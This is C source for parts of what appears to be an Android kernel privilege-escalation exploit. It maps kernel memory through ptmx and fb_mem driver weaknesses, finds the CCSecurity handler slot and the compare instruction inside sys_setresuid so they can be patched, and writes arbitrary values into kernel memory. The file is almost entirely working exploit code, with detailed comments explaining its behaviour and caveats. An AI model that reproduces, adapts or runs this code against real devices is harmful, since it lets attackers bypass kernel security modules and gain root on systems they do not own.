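/*
 * Map kernel memory into this process and record where it landed in the
 * file-level globals.
 *
 * Order of attempts:
 *   1. ptmx_map_memory at the fixed PTMX_MEMORY_MAPPED_ADDRESS.
 *   2. fb_mem_mmap, after shifting the driver's physical offset down by
 *      0x8000 (the same adjustment attempt_mmap_fb_mem_exploit applies;
 *      the origin of the constant is not visible in this file).
 *
 * Side effects: kernel_physical_offset (via setup_variables when it is
 * still 0), kernel_mapped_address, fb_mem_mmap_base and fb_mmap_fd.
 * On the ptmx path fb_mmap_fd stays -1 and fb_mem_mmap_base is untouched.
 *
 * Returns true when one of the two mappings succeeded, false otherwise.
 * NOTE: on total failure kernel_mapped_address is left at the ptmx
 * address even though nothing is mapped there (unchanged from the
 * original behaviour) — callers must rely on the return value, not on
 * the global.
 */
bool map_kernel_memory(void)
{
    if (!kernel_physical_offset && !setup_variables()) {
        return false;
    }

    fb_mmap_fd = -1;
    kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;
    if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
        return true;
    }

    fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);
    printf("Attempt fb_mem_exploit...\n");
    fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);

    /*
     * The other fb_mem_mmap callers in this file compare the result with
     * MAP_FAILED, which is non-NULL and would pass a plain truthiness
     * test. Accept either sentinel as failure so a failed mapping is
     * never handed out through kernel_mapped_address.
     */
    if (fb_mem_mmap_base && fb_mem_mmap_base != MAP_FAILED) {
        kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address(
            (void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
        return true;
    }

    /* Leave the globals in a state later truthiness checks read as "unmapped". */
    fb_mem_mmap_base = NULL;
    fb_mmap_fd = -1;
    return false;
}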
/*
 * Find the slot inside the ccsecurity_ops structure that holds a pointer
 * to __ccs_search_binary_handler.
 *
 * Both symbols are resolved with the kallsyms_in_memory helpers; the
 * second may resolve to several addresses (NULL-terminated array, owned
 * by this function and freed before returning). The first 0x100 bytes of
 * the mapped copy of ccsecurity_ops are scanned byte-wise with memmem for
 * each candidate pointer value, so a hit is not required to be
 * pointer-aligned — the caller should be aware of that when treating the
 * result as a slot address.
 *
 * Returns the address of the matching bytes inside the mapping, or NULL
 * if either symbol is unknown or no candidate occurs in the window.
 */
static void* find_ccs_search_binary_handler_address_in_ccsecurity_ops(void *mmap_base_address)
{
    unsigned long int ops_sym = kallsyms_in_memory_lookup_name("ccsecurity_ops");
    if (!ops_sym) {
        return NULL;
    }

    unsigned long int *handlers = kallsyms_in_memory_lookup_names("__ccs_search_binary_handler");
    if (!handlers) {
        return NULL;
    }

    void *mapped_ops = fb_mem_convert_to_mmaped_address((void*)ops_sym, mmap_base_address);
    void *hit = NULL;
    for (unsigned long int *cand = handlers; *cand; cand++) {
        hit = memmem(mapped_ops, 0x100, cand, sizeof(*cand));
        if (hit) {
            break;
        }
    }

    free(handlers);
    return hit;
}
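/*
 * Map the fb_mem region for the duration of one callback.
 *
 * The callback receives PAGE_OFFSET translated into the mapping plus
 * KERNEL_SIZE as the length, and callback_param unchanged. Unlike
 * map_kernel_memory this is a scoped attempt: fb_mem_munmap runs before
 * returning whatever the callback's result was, so callback_func must
 * not retain the pointer it is given.
 *
 * Returns the callback's result, or false when the mapping failed.
 */
static bool attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
    unsigned long int phys_offset = get_kernel_physical_offset();
    if (phys_offset) {
        /* Same 0x8000 shift map_kernel_memory applies before fb_mem_mmap. */
        fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
    }

    int fd = -1;
    void *base = fb_mem_mmap(&fd);
    /*
     * map_kernel_memory tests this call for NULL, the other callers for
     * MAP_FAILED; reject both so neither convention reaches the callback.
     */
    if (!base || base == MAP_FAILED) {
        return false;
    }

    void *kernel_view = fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, base);
    bool ok = callback_func(kernel_view, KERNEL_SIZE, callback_param);
    fb_mem_munmap(base, fd);
    return ok;
}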
/*
 * Locate the compare instruction inside sys_setresuid.
 *
 * The symbol is resolved through the mapped image, then the first 0x100
 * bytes of its mapped copy are searched for the byte pattern held in the
 * file-level cmp_operation_code. A cmp that sits more than 0x100 bytes
 * into the function is not found.
 *
 * Returns the address of the match inside the mapping, or NULL when the
 * symbol cannot be resolved or the pattern is absent. The strerror(errno)
 * in the failure message is only meaningful if
 * get_sys_setresuid_address_in_memory sets errno — not visible here.
 */
static void* find_cmp_operation_address_in_sys_setresuid(void *mmap_base_address)
{
    unsigned long int sym = get_sys_setresuid_address_in_memory(mmap_base_address);
    if (sym == 0) {
        printf("Failed to get sys_setresuid address due to %s\n", strerror(errno));
        return NULL;
    }

    void *mapped_sym = fb_mem_convert_to_mmaped_address((void*)sym, mmap_base_address);
    return memmem(mapped_sym, 0x100, &cmp_operation_code, sizeof(cmp_operation_code));
}
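/*
 * Store one int at `address` through a fresh fb_mem mapping.
 *
 * `address` is translated with fb_mem_convert_to_mmaped_address, the
 * store is issued, and the mapping is released again before returning.
 *
 * Returns false if the mapping could not be created or the address did
 * not translate, true once the store has been issued (the store itself
 * is not read back or verified).
 *
 * Caveats: `address` is assumed to be int-aligned and to lie within the
 * region the mapping covers; neither is checked here.
 */
bool fb_mem_write_value_at_address(unsigned long int address, int value)
{
    int fd = -1;
    void *base = fb_mem_mmap(&fd);
    /*
     * map_kernel_memory tests this call for NULL, the other callers for
     * MAP_FAILED; reject both so a failed mapping is never written through.
     */
    if (!base || base == MAP_FAILED) {
        return false;
    }

    int *target = (int *)fb_mem_convert_to_mmaped_address((void *)address, base);
    if (!target) {
        fb_mem_munmap(base, fd);
        return false;
    }

    *target = value;
    fb_mem_munmap(base, fd);
    return true;
}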